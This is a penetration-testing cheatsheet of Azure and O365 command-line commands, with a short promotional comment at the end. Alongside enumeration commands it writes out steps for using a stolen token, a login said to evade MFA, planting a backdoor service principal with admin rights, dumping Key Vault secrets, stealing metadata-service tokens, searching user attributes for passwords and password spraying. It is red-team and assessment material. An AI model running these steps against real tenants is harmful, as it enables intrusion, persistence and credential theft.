Microsoft Azure & O365 CLI Tool Cheatsheet
By Beau Bullock (@dafthack)
Az PowerShell Module
Import-Module Az
Authentication
Connect-AzAccount
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Import a context file
Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'
Export a context file
Save-AzContext -Path C:\Temp\AzureAccessToken.json
Account Information
List the current Azure contexts available
Get-AzContext -ListAvailable
Get context details
$context = Get-AzContext
$context.Name
$context.Account
List subscriptions
Get-AzSubscription
Choose a subscription
Select-AzSubscription -SubscriptionID "SubscriptionID"
Get the current user's role assignment
Get-AzRoleAssignment
List all resources and resource groups
Get-AzResource
Get-AzResourceGroup
List storage accounts
Get-AzStorageAccount
WebApps & SQL
List Azure web applications
Get-AzAdApplication
Get-AzWebApp
List SQL servers
Get-AzSQLServer
Individual databases can be listed with information retrieved from the previous command
Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
List SQL Firewall rules
Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName
List SQL Server AD Admins
Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
Runbooks
List Azure Runbooks
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Export a runbook with:
Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\
Virtual Machines
List VMs and get OS details
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile
Run commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
Networking
List virtual networks
Get-AzVirtualNetwork
List public IP addresses assigned to virtual NICs
Get-AzPublicIpAddress
Get Azure ExpressRoute (VPN) Info
Get-AzExpressRouteCircuit
Backdoors
Create a new Azure service principal as a backdoor
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal
MSOnline PowerShell Module
Import-Module MSOnline
Authentication
Connect-MsolService
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-MsolService -Credential $credential
Account and Directory Information
List Company Information
Get-MSolCompanyInformation
List all users
Get-MSolUser -All
List all groups
Get-MSolGroup -All
List members of a group (Global Admins in this case)
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember –GroupObjectId $GUID
List all user attributes
Get-MSolUser –All | fl
List Service Principals
Get-MsolServicePrincipal
One-liner to search all Azure AD user attributes for passwords
$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}
Az CLI Tool
Authentication
az login
Dump Azure Key Vaults
List out any key vault resources the current account can view
az keyvault list –query '[].name' --output tsv
With contributor level access you can give yourself the right permissions to obtain secrets.
az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list
Get URI for Key Vault
az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv
Get cleartext secret from keyvault
az keyvault secret show --id <URI from last command> | ConvertFrom-Json
Metadata Service URL
http://169.254.169.254/metadata
Get access tokens from the metadata service
GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true
Other Azure & O365 Tools
MicroBurst
Azure security assessment tool
https://github.com/NetSPI/MicroBurst
Look for open storage blobs
Invoke-EnumerateAzureBlobs -Base $BaseName
Export SSL/TLS certs
Get-AzPasswords -ExportCerts Y
Azure Container Registry dump
Get-AzPasswords
Get-AzACR
PowerZure
Azure security assessment tool
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
Red team tool for graphing Azure and Azure AD objects
https://github.com/Azure/Stormspotter
MSOLSpray
Tool to password spray Azure/O365
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Top comments (1)
Penetration testing companies can provide you with the expertise and resources you need to test your Azure environment and identify any security vulnerabilities. They will work with you to develop a custom testing plan that meets your specific needs and budget.